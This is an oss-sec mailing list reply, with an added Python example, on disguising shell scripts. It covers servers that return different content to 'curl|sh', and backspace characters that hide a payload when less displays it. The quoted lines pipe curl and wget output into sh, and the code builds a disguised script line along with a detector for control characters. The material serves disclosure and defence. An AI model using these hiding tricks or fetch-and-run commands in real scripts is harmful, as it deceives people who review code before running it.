oss-sec mailing list archives

Re: s/party/hack like it's 1999


From: Jakub Wilk <jwilk () jwilk net>
Date: Thu, 21 Apr 2016 21:45:59 +0200

* up201407890 () alunos dcc fc up pt, 2015-09-17, 18:03:
> $ curl 127.0.0.1/backdoor.sh
> #!/bin/bash
> echo doing something very nice!
>
> $ wget -qO - 127.0.0.1/backdoor.sh
> #!/bin/bash
> echo doing something very nice!
>
>
> But if we pipe it into a shell...
>
>
> $ curl -s 127.0.0.1/backdoor.sh|sh
> doing something evil!
>
> $ wget -qO - 127.0.0.1/backdoor.sh|sh
> doing something evil!
>
>
> You might be thinking "If I opened that in my browser, I would detect it being malicious!"
> Well, think again...
> One can have all sorts of fun with user-agents; something that can easily come to mind is verifying whether the user-agent is from curl or wget,

...or this:
https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/

> 'less' doesn't interpret escape sequences unless the -r switch is used, so stop aliasing it to 'less -r' just because there's no colored output.

As somebody else noted, it should be s/doesn't interpret/neutralizes/ or something. But that doesn't mean you should feel safe if you don't use -r.

For example, when git automatically spawns a pager, it puts R in the LESS environment variable. (That would be fine if git escaped \033 before passing them to the pager, but it doesn't. Oddly, it does seem to escape other control characters.) Now, -R is less convenient than -r for hiding malicious code, but you could still set foreground and background to black in hope that the victim's terminal background is also black.

But even without -r or -R, one can use backspace characters to hide an evil payload:

| $ less -FX hello.c
| #include <stdio.h>
| #include <stdlib.h>
|
| int main(int argc, char **argv)
| {
|         /* Copyright 2015-2016 Jakub Wilk */
|         printf("Hello world!\n");
|         return 0;
| }
|
| $ gcc -Wall hello.c -o hello && ./hello
|  ________
| < ^H^H^H >
|  --------
|         \   ^__^
|          \  (oo)\_______
|             (__)\       )\/\
|                 ||----w |
|                 ||     ||

--
Jakub Wilk

Attachment: hello.c
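
The backspace trick from the message above, rebuilt as an added example (this is not code from the post or its hello.c attachment). The script line, payload and cover text are constructed for the demonstration. The viewer model follows what less(1) documents for its default backspace handling (no -r, -R, -u or -U): a backspace that is not part of an overstrike or underline pair is dropped together with the character before it; a terminal receiving the raw bytes moves the cursor back and overwrites, so the cover text is padded to the length of the hidden part. `run_with_sh` assumes a POSIX sh on PATH and is only called when the file is run directly.

```python
"""Model of the backspace trick: a script that looks harmless in less or in a
terminal but runs something else.  Added example, not from the original post."""
import shlex
import subprocess

BS = "\x08"

# Constructed sample payload and cover text (not from the original post).
EVIL = 'echo "doing something evil!"'
BENIGN = 'echo "doing something very nice!"'


def hide_line(hidden, visible):
    """Return one script line that sh executes as `hidden` but that a
    backspace-interpreting viewer shows as `visible`.

    Layout: <hidden> + " #" + BS * n + <visible padded to n>, n = len(hidden) + 2.
    The shell stops reading at "#", so the backspaces and the cover text are a
    comment.  less (default handling) drops each backspace with the character
    before it; a terminal moves the cursor back.  Padding the cover text to n
    makes sure no tail of the hidden part is left on screen in the terminal case.
    """
    prefix = hidden + " #"
    return prefix + BS * len(prefix) + visible.ljust(len(prefix))


def render_as_viewer(text):
    """Approximate what less or a terminal shows: a backspace removes the
    character before it.  (less renders x BS x as bold x and _ BS x as
    underlined x; the glyph is the same, so the visible text is unchanged.)"""
    out_lines = []
    for line in text.split("\n"):
        buf = []
        for ch in line:
            if ch == BS:
                if buf:
                    buf.pop()
            else:
                buf.append(ch)
        out_lines.append("".join(buf))
    return "\n".join(out_lines)


def shell_view(script):
    """Approximate what sh executes: tokenize each line with shell-style quoting
    and '#' comments.  shlex is a model of the shell lexer, not sh itself."""
    words = []
    for line in script.split("\n"):
        toks = shlex.split(line, comments=True)
        if toks:
            words.append(toks)
    return words


def find_control_chars(text):
    """The check to run before piping anything into sh: report every C0 control
    character except TAB and LF, plus DEL, as (line, column, escaped byte).
    This catches backspaces as well as the ESC of colour sequences."""
    hits = []
    for lineno, line in enumerate(text.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            code = ord(ch)
            if (code < 0x20 and ch != "\t") or code == 0x7F:
                hits.append((lineno, col, "\\x%02x" % code))
    return hits


def build_script():
    """Constructed two-line script: shebang plus the disguised command."""
    return "#!/bin/sh\n" + hide_line(EVIL, BENIGN) + "\n"


def run_with_sh(script):
    """Actually execute the script (assumes a POSIX sh on PATH)."""
    return subprocess.run(["sh"], input=script, capture_output=True,
                          text=True).stdout


if __name__ == "__main__":
    script = build_script()
    print("--- as a pager or terminal shows it ---")
    print(render_as_viewer(script), end="")
    print("--- as the shell tokenizes it ---")
    print(shell_view(script))
    print("--- control characters present (first three) ---")
    print(find_control_chars(script)[:3])
    print("--- what sh actually runs ---")
    print(run_with_sh(script), end="")
```

Write `build_script()` to a file and compare `less file` with `cat -v file` or `less -U file` (both show the backspaces as ^H) to see the gap between what the pager renders and what `sh file` runs; the point of `find_control_chars` is that the presence of any such byte in a script fetched over the network is reason enough not to pipe it anywhere.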